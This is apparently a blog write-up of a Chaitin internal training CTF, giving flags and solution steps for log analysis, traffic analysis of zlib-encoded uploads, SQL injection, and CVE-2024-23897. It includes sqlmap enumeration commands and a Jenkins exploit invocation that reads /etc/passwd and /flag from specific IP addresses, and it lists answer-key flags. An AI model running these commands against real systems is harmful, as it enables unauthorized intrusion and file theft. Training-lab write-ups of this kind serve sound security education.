首页 > 其他分享 >内部培训测试 - 长亭科技平台

内部培训测试 - 长亭科技平台

时间:2024-12-22 14:20:24浏览次数:3  
标签:培训 长亭 upload flag 789c333430000001260092 测试 789c33350400009d0067 789c3335030000a

1、 日志分析2024 (100 分)简单安全杂项

0,1),1,1))=102 这些后面的数字。

flag{mayiyahei1965ae7569}

2、 事件协同与响应-考试 (200 分)中等安全杂项

蚁剑马 Key: d76R3478
flag{578530@chaitin}

3、 Misc-流量分析 (100 分)简单安全杂项\

过滤排序后为

/agent/metrics/putLines	
/upload/0	789c333430020001280094
/upload/1	789c3334b00000012e009a
/upload/2	789cb334070000ab0071
/upload/3	789c333430060001290095
/upload/4	789c3334320600012d0097
/upload/5	789c333430000001260092
/upload/6	789c33350400009d0067
/upload/7	789c33350200009e0068
/upload/8	789c33b1040000a3006e
/upload/9	789c333430020001280094
/upload/10	789c33350200009e0068
/upload/11	789c33350000009c0066
/upload/12	789c3335050000a1006b
/upload/13	789c333430040001270093
/upload/14	789c3335050000a1006b
/upload/15	789c3335070000a3006d
/upload/16	789c3335050000a1006b
/upload/17	789c33350200009e0068
/upload/18	789cb3b4000000ac0072
/upload/19	789c33350400009d0067
/upload/20	789c33350400009d0067
/upload/21	789cb334070000ab0071
/upload/22	789c3335030000a2006c
/upload/23	789c333430020001280094
/upload/24	789c333430000001260092
/upload/25	789cb3b4000000ac0072
/upload/26	789c3335030000a2006c
/upload/27	789c333430000001260092
/upload/28	789c33350400009d0067
/upload/29	789c3335030000a2006c
/upload/30	789c3335010000a0006a
/upload/31	789c333430000001260092
/upload/32	789cb334070000ab0071
/upload/33	789c3335030000a2006c
/upload/34	789c3335050000a1006b
/upload/35	789c3335030000a2006c
/upload/36	789c333430020001280094
/upload/37	789c3334320500012f0099

zlib解码。得到flag
flag{d341f427e7974b33a8fdb8d386da878f}

4、 Web-SQL注入 (200 分)中等web安全

sqlmap -u http://101.200.43.249/sql2.php/?id= --current-user
sqlmap -u http://101.200.43.249/sql2.php/?id= -D pwnhubsql2 --tables
sqlmap -u http://101.200.43.249/sql2.php/?id= -D pwnhubsql2 -T flaghahaha --columns
flag{43913e17463a90ecbebd2bdfa0ab362b}

5、 CVE-2024-23897 (200 分)中等web安全

CVE-2024-23897 -url http://59.110.164.194:8080/ -c reload-job -a /etc/passwd
flag{afc832a6-b6be-7732-fb89-deefec2a7def}
usage: CVE-2024-23897.py -u http://59.110.164.194:8080 -f /flag

标签:培训,长亭,upload,flag,789c333430000001260092,测试,789c33350400009d0067,789c3335030000a
From: https://www.cnblogs.com/wgf4242/p/18622090

相关文章

  • 方案设计三驾马车:理论计算、仿真分析与实验测试,相辅相成,互相印证。
     ......
  • js如何做单元测试?步骤是什么?
    在前端开发中,进行JavaScript的单元测试是保证代码质量的重要环节。以下是进行JavaScript单元测试的基本步骤:选择测试框架:首先,你需要选择一个适合的测试框架。目前流行的测试框架有Mocha、Jest、Jasmine等。这些框架提供了丰富的功能和易用的接口,可以满足大部分的测试需求。搭建......
  • ChatGPT接口测试用例生成的流程
     通常,使用ChatGPT生成接口测试用例的流程可以分为以下关键步骤。收集接口信息收集接口的相关文档和信息,如接口名称、请求方法、请求参数、返回结果等。这些是ChatGPT生成测试用例需要的输入信息。这一步骤的重要性不可忽视,因为它为ChatGPT提供了上下文,使其能够......
  • 浅聊web前端性能测试
    最近正好在做web前端的性能测试,这次就来聊聊关于这个的测试思路~首先从用户的思维去思考,关于web前端性能,用户最看重的是什么......其实就是下面三个点:1.加载性能(即页面加载时间+资源加载时间)2.渲染性能(即浏览器绘制出包含实际内容(如文本、图片等)的时间)3.交互......
  • 【测试】Pytest
    建议关注、收藏!目录功能pytest自动化测试工具。功能单元测试:用于验证代码的最小功能单元(如函数、方法)的正确性。简单的语法:不需要继承特定类或使用复杂的结构。断言语句简化。自动发现测试:Pytest会自动查找以test_开头的函数或文件。defadd(a,b):re......
  • Node.js 单元测试指南:使用 Mocha 和 Chai 提高代码质量
    Node.js单元测试指南:使用Mocha和Chai提高代码质量随着Node.js项目的逐渐增大,单元测试(UnitTesting)成为确保代码质量、稳定性和可维护性的重要手段。在Node.js开发中,Mocha和Chai是两个非常流行的单元测试工具,前者用于执行测试,而后者提供了丰富的断言库。在本文......
  • 机器学习实验六:朴素贝叶斯算法实现与测试
    实验六:朴素贝叶斯算法实现与测试一、实验目的深入理解朴素贝叶斯的算法原理,能够使用Python语言实现朴素贝叶斯的训练与测试,并且使用五折交叉验证算法进行模型训练与评估。  二、实验内容(1)从scikit-learn库中加载iris数据集,使用留出法留出1/3的样本作为测试集(注......
  • 机器学习实验七:K 均值聚类算法实现与测试
    实验七:K均值聚类算法实现与测试一、实验目的深入理解K均值聚类算法的算法原理,进而理解无监督学习的意义,能够使用Python语言实现K均值聚类算法的训练与测试,并且使用五折交叉验证算法进行模型训练与评估。 二、实验内容(1)从scikit-learn库中加载iris数据集,使用留出法......
  • 机器学习实验八:随机森林算法实现与测试
    实验八:随机森林算法实现与测试一、实验目的深入理解随机森林的算法原理,进而理解集成学习的意义,能够使用Python语言实现随机森林算法的训练与测试,并且使用五折交叉验证算法进行模型训练与评估。 二、实验内容(1)从scikit-learn库中加载iris数据集,使用留出法留出1/3的......
  • 机器学习实验三:C4.5(带有预剪枝和后剪枝)算法实现与测试
    实验三:C4.5(带有预剪枝和后剪枝)算法实现与测试一、实验目的深入理解决策树、预剪枝和后剪枝的算法原理,能够使用Python语言实现带有预剪枝和后剪枝的决策树算法C4.5算法的训练与测试,并且使用五折交叉验证算法进行模型训练与评估。 二、实验内容(1)从scikit-learn库中加载......